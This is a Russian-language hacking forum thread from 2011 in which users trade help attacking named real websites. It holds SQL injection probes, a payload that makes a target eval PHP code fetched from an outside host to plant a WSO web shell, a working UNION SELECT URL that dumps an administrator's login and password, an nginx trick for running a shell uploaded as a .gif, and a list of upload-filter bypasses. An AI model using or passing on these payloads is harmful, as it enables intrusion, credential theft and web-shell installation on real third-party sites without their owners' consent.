HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #16991  
Старый 14.05.2011, 18:15
FlaktW
Участник форума
Регистрация: 19.08.2009
Сообщений: 115
Провел на форуме:
111014

Репутация: 8
По умолчанию

Цитата:
Сообщение от AleksNEW  
AleksNEW said:
Доброго времени суток. Вопрос следующий:
http://www.designersimports.com/itemdetail.asp?mod=EH5009LOT - good
http://www.designersimports.com/itemdetail.asp?mod=EH5009LOT' -bad
Это SQL ?
Нет.

http://www.designersimports.com/itemdetail.asp?mod=EH5009LOT%20and%20true=true

http://www.designersimports.com/itemdetail.asp?mod=EH5009LOT%20and%20true=false
 
Ответить с цитированием

  #16992  
Старый 14.05.2011, 18:41
skM
Guest
Сообщений: n/a
Провел на форуме:
7865

Репутация: 0
По умолчанию

Файлы с тильдой на конце обычно являются файлами отката различных текстовых редакторов
 
Ответить с цитированием

  #16993  
Старый 15.05.2011, 00:21
o'clock
Новичок
Регистрация: 16.05.2009
Сообщений: 12
Провел на форуме:
135091

Репутация: 2
По умолчанию

Код:
Code:
Warning: parse_url(/item.php?act=-1%27%20UNION%20SELECT%201,2,3,%27%3C?php%20eval(file_get_contents(%27http://smile.h19.ru/wso2.php%27));) [function.parse-url]: Unable to parse url in /var/www/vhosts/sko-lotos.com/httpdocs/lib/xajax.inc.php on line 630
Почему выскакивает такая штука, и как это обойти? Спасибо.

Вот запрос:

Код:
Code:
http://www.sko-lotos.com/item.php?act=-1%27%20UNION%20SELECT%201,2,3,%27%3C?php%20eval%28file_get_contents%28%27http://smile.h19.ru/wso2.php%27%29%29;
 
Ответить с цитированием

  #16994  
Старый 15.05.2011, 00:49
Tigger
Познавший АНТИЧАТ
Регистрация: 27.08.2007
Сообщений: 1,107
Провел на форуме:
5386281

Репутация: 1177


Отправить сообщение для Tigger с помощью ICQ
По умолчанию

Цитата:
Сообщение от o'clock  
o'clock said:
Код:
Code:
Warning: parse_url(/item.php?act=-1%27%20UNION%20SELECT%201,2,3,%27%3C?php%20eval(file_get_contents(%27http://smile.h19.ru/wso2.php%27));) [function.parse-url]: Unable to parse url in /var/www/vhosts/sko-lotos.com/httpdocs/lib/xajax.inc.php on line 630
Почему выскакивает такая штука, и как это обойти? Спасибо.
Вот запрос:
Код:
Code:
http://www.sko-lotos.com/item.php?act=-1%27%20UNION%20SELECT%201,2,3,%27%3C?php%20eval%28file_get_contents%28%27http://smile.h19.ru/wso2.php%27%29%29;
А не проще ли было загуглить ф-цию \ ошибку?

Функция не может распарсить URL, потому что URL для нее невалиден.
 
Ответить с цитированием

  #16995  
Старый 15.05.2011, 04:25
lulz
Guest
Сообщений: n/a
Провел на форуме:
261

Репутация: 1
По умолчанию

Цитата:
Сообщение от o'clock  
o'clock said:
Код:
Code:
Warning: parse_url(/item.php?act=-1%27%20UNION%20SELECT%201,2,3,%27%3C?php%20eval(file_get_contents(%27http://smile.h19.ru/wso2.php%27));) [function.parse-url]: Unable to parse url in /var/www/vhosts/sko-lotos.com/httpdocs/lib/xajax.inc.php on line 630
Почему выскакивает такая штука, и как это обойти? Спасибо.
Вот запрос:
Код:
Code:
http://www.sko-lotos.com/item.php?act=-1%27%20UNION%20SELECT%201,2,3,%27%3C?php%20eval%28file_get_contents%28%27http://smile.h19.ru/wso2.php%27%29%29;
о0, хакер, ты не мог бы объяснить мне этот запрос?

union select ''

Во-первых, там нет прав, если ты планировал залить результаты выборки(читай твой зло-код эвала) селекта в файл. К томуже, твоя конструкция(без outfile, etc) ни к чему бы и не привела=/

Во-вторых, где ты там скулю увидел?

В-третьих, вот скуля с выводом, логин и пасс одмино.

Код:
Code:
http://www.sko-lotos.com/catalog.php?id=381'and(0)union select 1,concat_ws(0x3b, name, password),3,4,5,6,7 from users-- -
 
Ответить с цитированием

  #16996  
Старый 15.05.2011, 07:16
foozzi
Новичок
Регистрация: 13.04.2010
Сообщений: 0
Провел на форуме:
1350

Репутация: 0
По умолчанию

имеется сайт на котором можно залить файлы, я залил шелл под видом wso2.php.gif как теперь его переименовать и запустить?
 
Ответить с цитированием

  #16997  
Старый 15.05.2011, 11:25
XAMEHA
Новичок
Регистрация: 15.05.2010
Сообщений: 0
Провел на форуме:
2268

Репутация: 0
По умолчанию

Цитата:
Сообщение от foozzi  
foozzi said:
имеется сайт на котором можно залить файлы, я залил шелл под видом wso2.php.gif как теперь его переименовать и запустить?
Если б всё было так просто. Если сервер nginx попробуй в URl набрать wso2.php.gif/.php
 
Ответить с цитированием

  #16998  
Старый 15.05.2011, 15:26
skM
Guest
Сообщений: n/a
Провел на форуме:
7865

Репутация: 0
По умолчанию

2 foozzi

почитай вот это

Цитата:
Сообщение от None  
file.PHP (file.PHP3 и т.д.)-- если в проверке по чёрному списку использовали регистрозависимые функции
file.jpg.php, file.gif.php (и вариации) -- при кривых регулярках
file.php.giflalala, file.php.lalalajpg -- кривые регулярки и mod_mime
file.php%00.gif -- опять-же криворукие программеры (тут несколько вариантов зависящих от реализации, например расширение отрубается при копировании, в функции copy() и мы получаем файл с расширением .php)
 
Ответить с цитированием

  #16999  
Старый 15.05.2011, 21:09
FlaktW
Участник форума
Регистрация: 19.08.2009
Сообщений: 115
Провел на форуме:
111014

Репутация: 8
По умолчанию

Здесь через ошибку помогите вывести:

http://dahliasuppliers.com/noahsclassifieds/index.php?method=showhtmllist&list=classifiedscate gory&rollid=11'+order+by+26+--+&fromfromlist=classifiedscategory&fromfrommethod= showhtmllist&clearoff=1
 
Ответить с цитированием

  #17000  
Старый 15.05.2011, 22:09
o'clock
Новичок
Регистрация: 16.05.2009
Сообщений: 12
Провел на форуме:
135091

Репутация: 2
По умолчанию

На сайте блинд скуль, но почему-то я не могу даже узнать версию бд, подскажите пожалуйста, что сделать чтоб узнать?

Код:
Code:
http://www.trudprava.ru/ibp.php?id=1%20and%20substring%28@@version,1,1%29= 5
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ